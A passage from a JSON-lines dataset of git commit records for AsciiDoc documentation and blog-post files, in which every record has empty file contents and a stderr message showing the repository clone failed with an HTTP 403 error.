page.\n","repos":"se-edu\/addressbook-level1,se-edu\/addressbook-level1","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/se-edu\/addressbook-level1.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5724a5838cbfbadf81c033e7454455a24e4a4ce4","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3365647dcb6dc484bd92f5ecf70e1845969718f","subject":"Update Asciidoctor.adoc","message":"Update Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"523e98e1a5af05d33ec6022a7e56ffa9d3061ca9","subject":"Add a copy of the LICENSE.adoc in the docs directory.","message":"Add a copy of the LICENSE.adoc in the docs directory.\n","repos":"nanomsg\/nng,nanomsg\/nng,nanomsg\/nng,nanomsg\/nng","old_file":"docs\/LICENSE.adoc","new_file":"docs\/LICENSE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanomsg\/nng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5fade958ea5fedc337769dd9800a63f90d4e69be","subject":"Added magic app doc","message":"Added magic app doc\n","repos":"bjornna\/dips-ckm,DIPSASA\/dips-ckm","old_file":"doc\/magic\/magic.adoc","new_file":"doc\/magic\/magic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjornna\/dips-ckm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8942bbaf255ab6371612f7db49762cacc65b334d","subject":"Update 2015-11-23-Deceived-by-Charms.adoc","message":"Update 2015-11-23-Deceived-by-Charms.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-11-23-Deceived-by-Charms.adoc","new_file":"_posts\/2015-11-23-Deceived-by-Charms.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"022af3433d91ead689190cbb084da9650f958129","subject":"y2b create post The 250GB Mega Storage iPhone!","message":"y2b create post The 250GB Mega Storage iPhone!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-13-The-250GB-Mega-Storage-iPhone.adoc","new_file":"_posts\/2016-07-13-The-250GB-Mega-Storage-iPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f93446f357dd5de67ab9397ab37ed907126a871c","subject":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","message":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b293489f6720b74afeb834f3b90da1fc51e929bf","subject":"Fix #485","message":"Fix #485\n\nadd systemProperties.adoc\n","repos":"OpenHFT\/Chronicle-Wire,OpenHFT\/Chronicle-Wire","old_file":"systemProperties.adoc","new_file":"systemProperties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Wire.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fbc770712c3a45220f97ce9e50cd205b4798ca84","subject":"y2b create post How To Instantly Chill Any Drink!","message":"y2b create post How To Instantly Chill Any Drink!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-17-How-To-Instantly-Chill-Any-Drink.adoc","new_file":"_posts\/2016-07-17-How-To-Instantly-Chill-Any-Drink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e7e8100db9282d7683e7af9a9a6ccb9a51afcc2","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"gtugablue\/gtugablue.github.io,gtugablue\/gtugablue.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gtugablue\/gtugablue.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"774203705762c3af5979ec91dce97a38b655045b","subject":"Create 2017-02-24-ask-lsj.adoc","message":"Create 2017-02-24-ask-lsj.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-24-ask-lsj.adoc","new_file":"_posts\/2017-02-24-ask-lsj.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48aa15da1616f656ec1a370b015765eb74724d6b","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"578168a25fea07af48abbd5feca13efe694a5fa8","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b59f486bdcc5b5df01f54b5b47e404f4aada91a","subject":"Syntax Interfaces","message":"Syntax Interfaces\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Syntax\/Interfaces.adoc","new_file":"Syntax\/Interfaces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d7112ab5a67e428f6f2c95f372483edfeebdac7","subject":"Adding the class outline","message":"Adding the class outline\n","repos":"kcunning\/flask-class,kcunning\/flask-class","old_file":"class-outline.asciidoc","new_file":"class-outline.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kcunning\/flask-class.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d583543bef433f7c288f250d86fdf916ec8925b","subject":"Update 2018-08-15-Loss-Event-Entry.adoc","message":"Update 2018-08-15-Loss-Event-Entry.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-08-15-Loss-Event-Entry.adoc","new_file":"_posts\/2018-08-15-Loss-Event-Entry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca64f7c64e873730d2dbaea4c9c036550263eeee","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheStudentsOutpost\/TheStudentsOutpost.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cb07dd907cbac1b3d1a681cf82266b06db346a0","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bae99672e2a7a88d545d2eb5331c7cd695b44470","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"43b75cf2e34e0f3c3fe213772a43d203151d38f6","subject":"Updated README","message":"Updated README\n","repos":"thenewcircle\/class-3272,thenewcircle\/class-3272,thenewcircle\/class-3272","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thenewcircle\/class-3272.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"693ff50ef446e6bdd63a356f9b293909a4b88454","subject":"Changed README","message":"Changed README\n","repos":"UCSolarCarTeam\/Schulich-Delta-OnBoard-Media-Control,UCSolarCarTeam\/Schulich-Delta-OnBoard-Media-Control","old_file":"SDL\/README.adoc","new_file":"SDL\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/UCSolarCarTeam\/Schulich-Delta-OnBoard-Media-Control.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"18485002c5274f434bf347b9626a85e42876da69","subject":"Create metrics-newrelic.adoc","message":"Create metrics-newrelic.adoc\n\nFirst draft of New Relic doc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/metrics-newrelic.adoc","new_file":"userguide\/tutorials\/metrics-newrelic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e5557b6919d7b66163dacb256be9c0aee7acef5a","subject":"Update 2016-01-04-JavaScript-Beginner.adoc","message":"Update 2016-01-04-JavaScript-Beginner.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5ef4f5596ff004657d3a2145da9cd81130af40e","subject":"Add example document for ifdef change","message":"Add example document for ifdef change\n","repos":"edusantana\/asciidoc-highlight","old_file":"test\/issues\/13.adoc","new_file":"test\/issues\/13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/edusantana\/asciidoc-highlight.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec6e781a918872ea1c05198549498beb0ff82a42","subject":"Update 2016-04-11-Buffer-Overflow-basico.adoc","message":"Update 2016-04-11-Buffer-Overflow-basico.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Buffer-Overflow-basico.adoc","new_file":"_posts\/2016-04-11-Buffer-Overflow-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8cedc155f299b81c120c5f0a7495864be6cf5cd7","subject":"add visual tools event","message":"add visual tools event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2022\/visual-tools-aug.adoc","new_file":"content\/events\/2022\/visual-tools-aug.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a577317e6ca9b4f9ad0c8e515635b5dd41cde2aa","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0896996420aeaeb042dc6f34569f3f3d8afcd872","subject":"Update 2017-03-23.adoc","message":"Update 2017-03-23.adoc","repos":"entropyz\/blog,entropyz\/blog,entropyz\/blog,entropyz\/blog","old_file":"_posts\/2017-03-23.adoc","new_file":"_posts\/2017-03-23.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/entropyz\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cfe3851d33560e7ed451b95d1a929f34c2c2f299","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd1a824efdbc53469044b3f904db6c5bcc19b66a","subject":"Update 2016-12-2-3-D.adoc","message":"Update 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-D.adoc","new_file":"_posts\/2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90a6f19c5431452fa2f412983b251e6bc12e74b0","subject":"y2b create post I got the PS4 early!","message":"y2b create post I got the PS4 early!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-11-11-I-got-the-PS4-early.adoc","new_file":"_posts\/2013-11-11-I-got-the-PS4-early.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f70ae047d6c0b21598d83932e81d3b9902889855","subject":"Added ref language to Gitbook","message":"Added ref language to Gitbook\n","repos":"acartapanis\/camel,lburgazzoli\/apache-camel,ssharma\/camel,acartapanis\/camel,davidkarlsen\/camel,gilfernandes\/camel,tkopczynski\/camel,nicolaferraro\/camel,prashant2402\/camel,NickCis\/camel,sverkera\/camel,driseley\/camel,objectiser\/camel,cunningt\/camel,JYBESSON\/camel,christophd\/camel,onders86\/camel,ullgren\/camel,yuruki\/camel,w4tson\/camel,gilfernandes\/camel,yuruki\/camel,w4tson\/camel,nicolaferraro\/camel,tadayosi\/camel,lburgazzoli\/camel,JYBESSON\/camel,curso007\/camel,nboukhed\/camel,prashant2402\/camel,DariusX\/camel,RohanHart\/camel,lburgazzoli\/camel,Fabryprog\/camel,jkorab\/camel,dmvolod\/camel,jonmcewen\/camel,snurmine\/camel,bhaveshdt\/camel,lburgazzoli\/apache-camel,tlehoux\/camel,mcollovati\/camel,gilfernandes\/camel,sirlatrom\/camel,punkhorn\/camel-upstream,isavin\/camel,anoordover\/camel,jkorab\/camel,zregvart\/camel,sverkera\/camel,sirlatrom\/camel,lburgazzoli\/apache-camel,JYBESSON\/camel,tadayosi\/camel,jonmcewen\/camel,gautric\/camel,veithen\/camel,dmvolod\/camel,anton-k11\/camel,kevinearls\/camel,prashant2402\/camel,gautric\/camel,punkhorn\/camel-upstream,akhettar\/camel,tkopczynski\/camel,christophd\/camel,nikhilvibhav\/camel,chirino\/camel,dmvolod\/camel,dmvolod\/camel,bhaveshdt\/camel,RohanHart\/camel,curso007\/camel,rmarting\/camel,snurmine\/camel,nikhilvibhav\/camel,rmarting\/camel,neoramon\/camel,gnodet\/camel,curso007\/camel,w4tson\/camel,acartapanis\/camel,akhettar\/camel,alvinkwekel\/camel,bhaveshdt\/camel,pkletsko\/camel,sverkera\/camel,pax95\/camel,tkopczynski\/camel,davidkarlsen\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,tdiesler\/camel,lburgazzoli\/camel,neoramon\/camel,bgaudaen\/camel,DariusX\/camel,tlehoux\/camel,tadayosi\/camel,Fabryprog\/camel,allancth\/camel,jamesnetherton\/camel,hqstevenson\/camel,Thopap\/camel,pmoerenhout\/camel,gnodet\/camel,pkletsko\/camel,jkorab\/camel,pax95\/camel,kevinearls\/camel,veithen\/camel,gnodet\/camel,tdiesler\/camel,scranton\/camel,sabre1041\/camel,salikjan\/camel,mgyongyosi\/camel,tkopczynski\/camel,tlehoux\/camel,sabre1041\/camel,nboukhed\/camel,NickCis\/camel,RohanHart\/camel,rmarting\/camel,onders86\/camel,jonmcewen\/camel,prashant2402\/camel,tkopczynski\/camel,bgaudaen\/camel,NickCis\/camel,sabre1041\/camel,gilfernandes\/camel,adessaigne\/camel,kevinearls\/camel,Thopap\/camel,gautric\/camel,ssharma\/camel,cunningt\/camel,jamesnetherton\/camel,prashant2402\/camel,prashant2402\/camel,RohanHart\/camel,allancth\/camel,nboukhed\/camel,apache\/camel,Thopap\/camel,veithen\/camel,punkhorn\/camel-upstream,pkletsko\/camel,mcollovati\/camel,jkorab\/camel,Thopap\/camel,tdiesler\/camel,kevinearls\/camel,jamesnetherton\/camel,isavin\/camel,sverkera\/camel,lburgazzoli\/apache-camel,anton-k11\/camel,christophd\/camel,rmarting\/camel,dmvolod\/camel,drsquidop\/camel,davidkarlsen\/camel,chirino\/camel,apache\/camel,NickCis\/camel,pax95\/camel,akhettar\/camel,alvinkwekel\/camel,jonmcewen\/camel,cunningt\/camel,bgaudaen\/camel,pmoerenhout\/camel,gilfernandes\/camel,tadayosi\/camel,w4tson\/camel,jarst\/camel,nboukhed\/camel,chirino\/camel,neoramon\/camel,scranton\/camel,jarst\/camel,ssharma\/camel,lburgazzoli\/camel,tadayosi\/camel,tdiesler\/camel,zregvart\/camel,isavin\/camel,anton-k11\/camel,sabre1041\/camel,w4tson\/camel,yuruki\/camel,ullgren\/camel,DariusX\/camel,nicolaferraro\/camel,pkletsko\/camel,veithen\/camel,snurmine\/camel,sirlatrom\/camel,adessaigne\/camel,anton-k11\/camel,pax95\/camel,adessaigne\/camel,anoordover\/camel,CodeSmell\/camel,isavin\/camel,akhettar\/camel,bhaveshdt\/camel,anton-k11\/camel,pmoerenhout\/camel,tadayosi\/camel,drsquidop\/camel,snurmine\/camel,jamesnetherton\/camel,jonmcewen\/camel,pmoerenhout\/camel,pmoerenhout\/camel,apache\/camel,yuruki\/camel,bgaudaen\/camel,objectiser\/camel,gnodet\/camel,davidkarlsen\/camel,gnodet\/camel,objectiser\/camel,nicolaferraro\/camel,scranton\/camel,mcollovati\/camel,lburgazzoli\/apache-camel,driseley\/camel,chirino\/camel,hqstevenson\/camel,bgaudaen\/camel,tlehoux\/camel,mgyongyosi\/camel,alvinkwekel\/camel,apache\/camel,apache\/camel,pax95\/camel,pkletsko\/camel,Fabryprog\/camel,driseley\/camel,sverkera\/camel,Thopap\/camel,jarst\/camel,drsquidop\/camel,driseley\/camel,driseley\/camel,neoramon\/camel,onders86\/camel,DariusX\/camel,curso007\/camel,ullgren\/camel,hqstevenson\/camel,bhaveshdt\/camel,JYBESSON\/camel,gilfernandes\/camel,RohanHart\/camel,pax95\/camel,curso007\/camel,sabre1041\/camel,anoordover\/camel,JYBESSON\/camel,CodeSmell\/camel,cunningt\/camel,sirlatrom\/camel,gautric\/camel,jamesnetherton\/camel,yuruki\/camel,JYBESSON\/camel,drsquidop\/camel,isavin\/camel,sabre1041\/camel,jkorab\/camel,driseley\/camel,cunningt\/camel,RohanHart\/camel,cunningt\/camel,Fabryprog\/camel,objectiser\/camel,christophd\/camel,adessaigne\/camel,anoordover\/camel,CodeSmell\/camel,christophd\/camel,ullgren\/camel,punkhorn\/camel-upstream,zregvart\/camel,sverkera\/camel,rmarting\/camel,onders86\/camel,adessaigne\/camel,zregvart\/camel,nboukhed\/camel,onders86\/camel,nikhilvibhav\/camel,neoramon\/camel,dmvolod\/camel,jamesnetherton\/camel,allancth\/camel,allancth\/camel,veithen\/camel,CodeSmell\/camel,anoordover\/camel,acartapanis\/camel,mgyongyosi\/camel,tlehoux\/camel,yuruki\/camel,NickCis\/camel,bhaveshdt\/camel,ssharma\/camel,lburgazzoli\/camel,apache\/camel,jarst\/camel,gautric\/camel,snurmine\/camel,drsquidop\/camel,akhettar\/camel,allancth\/camel,mcollovati\/camel,tlehoux\/camel,onders86\/camel,mgyongyosi\/camel,scranton\/camel,Thopap\/camel,adessaigne\/camel,drsquidop\/camel,snurmine\/camel,anton-k11\/camel,hqstevenson\/camel,rmarting\/camel,sirlatrom\/camel,sirlatrom\/camel,scranton\/camel,NickCis\/camel,tkopczynski\/camel,isavin\/camel,lburgazzoli\/apache-camel,jarst\/camel,acartapanis\/camel,chirino\/camel,ssharma\/camel,w4tson\/camel,jkorab\/camel,pkletsko\/camel,veithen\/camel,jonmcewen\/camel,bgaudaen\/camel,acartapanis\/camel,christophd\/camel,hqstevenson\/camel,tdiesler\/camel,neoramon\/camel,scranton\/camel,chirino\/camel,curso007\/camel,kevinearls\/camel,jarst\/camel,akhettar\/camel,gautric\/camel,alvinkwekel\/camel,salikjan\/camel,ssharma\/camel,allancth\/camel,mgyongyosi\/camel,kevinearls\/camel,nboukhed\/camel,anoordover\/camel,mgyongyosi\/camel,lburgazzoli\/camel,tdiesler\/camel,hqstevenson\/camel","old_file":"camel-core\/src\/main\/docs\/ref-language.adoc","new_file":"camel-core\/src\/main\/docs\/ref-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2551a05fbca37a6e4058df5f0f0eb77ecfdfffdb","subject":"Update 2018-05-14-How-to-Build-a-PC.adoc","message":"Update 2018-05-14-How-to-Build-a-PC.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2018-05-14-How-to-Build-a-PC.adoc","new_file":"_posts\/2018-05-14-How-to-Build-a-PC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9435ae28e963a9cda715c0dcd9d8458ec79527a","subject":"CL: string-starts-with?","message":"CL: string-starts-with?\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"69e232e86ea8fbd92f5b689ce1efc9cbf1b881c3","subject":"Upgrade recipe 8","message":"Upgrade recipe 8\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"download\/upgradeRecipe\/upgradeRecipe8.adoc","new_file":"download\/upgradeRecipe\/upgradeRecipe8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/droolsjbpm\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7a958bdf00d12a68843493052020bb9fef5642fc","subject":"+ initial draft of README","message":"+ initial draft of README\n","repos":"cjxgm\/fancy-status,cjxgm\/fancy-status","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjxgm\/fancy-status.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13f4e871e0d092be580c6ad583f58ecbd3abb9c9","subject":"add readme for irc channel","message":"add readme for irc channel\n","repos":"devnull-tools\/boteco,devnull-tools\/boteco","old_file":"channels\/boteco-channel-irc\/README.adoc","new_file":"channels\/boteco-channel-irc\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devnull-tools\/boteco.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8bc09fe6ac2b7f977fa9da58acd6be212ea37a8","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f53d087fd57f3ee7dfadb54dfdc19ea18be3dd3","subject":"Update 2016-01-04-Java-Annotations.adoc","message":"Update 2016-01-04-Java-Annotations.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-Java-Annotations.adoc","new_file":"_posts\/2016-01-04-Java-Annotations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb438e7da2356d71d587a97ef37584a8978104d5","subject":"Update 2017-04-21-MVC-MVP-and-MVVM.adoc","message":"Update 